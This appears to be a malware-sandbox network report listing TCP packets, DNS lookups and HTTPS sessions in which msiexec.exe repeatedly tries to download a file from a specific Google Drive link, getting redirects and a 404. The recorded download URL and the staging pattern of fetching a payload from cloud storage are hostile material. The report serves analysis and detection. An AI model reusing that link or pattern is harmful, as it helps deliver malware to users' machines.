                                                                        Mar 7, 2025 22:47:15.850660086 CET49730443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:15.850708008 CET44349730216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:15.863717079 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:15.863765001 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:15.863835096 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:15.864115953 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:15.864131927 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.922533035 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.922643900 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.924253941 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.924264908 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.924510002 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:17.924555063 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.924832106 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:17.968324900 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798623085 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798672915 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798701048 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.798718929 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.798733950 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.798851967 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.800327063 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.800405025 CET44349731142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:18.800498009 CET49731443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:18.919636965 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:18.919701099 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:18.919835091 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:18.920079947 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:18.920089960 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:20.991605043 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:20.991771936 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:20.993741989 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:20.993755102 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:20.993876934 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:20.993881941 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852293968 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852499962 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.852529049 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852580070 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.852636099 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.852750063 CET44349732216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:21.852811098 CET49732443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:21.866972923 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:21.867011070 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:21.867089033 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:21.867311954 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:21.867325068 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.000996113 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.001117945 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.002743959 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.002753019 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.003138065 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.003190994 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.003453970 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.044334888 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964629889 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964709997 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964724064 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964768887 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964776993 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964808941 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964827061 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964873075 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.964885950 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.964932919 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.965781927 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:24.965852976 CET44349733142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:24.965910912 CET49733443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:25.107207060 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:25.107316017 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:25.107486963 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:25.107671976 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:25.107698917 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.337619066 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.337707996 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.340321064 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.340396881 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.342313051 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.342333078 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.342833996 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:27.342895031 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.343436956 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:27.388323069 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.293688059 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.293764114 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:28.293776989 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.293838024 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:28.294034004 CET49734443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:28.294061899 CET44349734216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:28.309556007 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:28.309602022 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:28.309664965 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:28.309899092 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:28.309916973 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.337565899 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.337734938 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.340003967 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.340020895 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.340327024 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:30.340399027 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.340758085 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:30.388320923 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247251034 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247302055 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247423887 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.247442007 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.247452974 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.247524023 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.248513937 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.248598099 CET44349735142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:31.248666048 CET49735443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:31.401258945 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:31.401329994 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:31.401449919 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:31.401938915 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:31.401954889 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:33.477806091 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:33.477936029 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:33.478518963 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:33.478535891 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:33.478792906 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:33.478800058 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324826956 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324893951 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.324917078 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324963093 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.324968100 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.324978113 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.325004101 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.325031996 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.325145006 CET49736443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:34.325158119 CET44349736216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:34.342756033 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:34.342863083 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:34.342977047 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:34.343410969 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:34.343442917 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:36.979727983 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:36.979839087 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:37.006742954 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:37.006803036 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:37.007091045 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:37.007164001 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:37.016324043 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:37.060347080 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:38.632225990 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:38.632287025 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:38.632365942 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:38.632405043 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:38.632422924 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:38.632457018 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:38.633047104 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:38.633135080 CET44349737142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:38.633208036 CET49737443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:38.779968023 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:38.780028105 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:38.780128956 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:38.780461073 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:38.780503035 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:41.868155956 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:41.868343115 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:41.869090080 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:41.869106054 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:41.869352102 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:41.869359016 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:43.150921106 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:43.151170015 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:43.151209116 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:43.151313066 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:43.151705027 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:43.151762009 CET44349738216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:43.151855946 CET49738443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:43.180906057 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:43.180969954 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:43.181066036 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:43.181359053 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:43.181375027 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:45.680160046 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:45.680322886 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:45.685225010 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:45.685237885 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:45.700654030 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:45.700751066 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:45.701637030 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:45.744321108 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:46.604269028 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:46.604351044 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:46.604505062 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:46.604505062 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:46.604551077 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:46.604619980 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:46.605168104 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:46.605211973 CET44349739142.250.185.193192.168.2.4
                                                                        Mar 7, 2025 22:47:46.605261087 CET49739443192.168.2.4142.250.185.193
                                                                        Mar 7, 2025 22:47:46.732172012 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:46.732217073 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:46.732291937 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:46.732623100 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:46.732640982 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:48.799031973 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:48.799228907 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:48.799741030 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:48.799841881 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:48.802767038 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:48.802797079 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:48.803173065 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:48.803232908 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:48.803972006 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:48.844341993 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:49.612785101 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:49.612931967 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:49.612998962 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:49.613071918 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:49.615051031 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:49.615117073 CET49740443192.168.2.4216.58.206.78
                                                                        Mar 7, 2025 22:47:49.615178108 CET44349740216.58.206.78192.168.2.4
                                                                        Mar 7, 2025 22:47:49.615241051 CET49740443192.168.2.4216.58.206.78

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Mar 7, 2025 22:46:40.905935049 CET5373953192.168.2.41.1.1.1
                                                                        Mar 7, 2025 22:46:40.913626909 CET53537391.1.1.1192.168.2.4
                                                                        Mar 7, 2025 22:46:43.904580116 CET5477753192.168.2.41.1.1.1
                                                                        Mar 7, 2025 22:46:43.913497925 CET53547771.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Mar 7, 2025 22:46:40.905935049 CET192.168.2.41.1.1.10x16d5Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                        Mar 7, 2025 22:46:43.904580116 CET192.168.2.41.1.1.10x256dStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Mar 7, 2025 22:46:40.913626909 CET1.1.1.1192.168.2.40x16d5No error (0)drive.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                        Mar 7, 2025 22:46:43.913497925 CET1.1.1.1192.168.2.40x256dNo error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • drive.google.com
                                                                        • drive.usercontent.google.com

                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449720216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:46:42 UTC216OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        2025-03-07 21:46:43 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:43 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-GCt8a1EMFLT0icOAQdxo4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449721142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:46:45 UTC258OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        2025-03-07 21:46:46 UTC1926INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIsWxfJ9ep40jMuJCWE3_iCcz-DTfuJi2zEY8NZNzPtQZbfn0LlTuGhDL7XqGo7VQNVKWCgj5Q0
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:46 GMT
                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-TIrMSrD2oFzpFFAenjnG7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Set-Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw; expires=Sat, 06-Sep-2025 21:46:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:46:46 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 75 57 47 6c 4a 77 45 76 64 61 70 4e 78 4a 6f 57 63 58 55 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="4uWGlJwEvdapNxJoWcXUkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.449722216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:46:49 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:46:50 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:46:49 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-elMAxi0WhXOIaA-QOg5Srg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
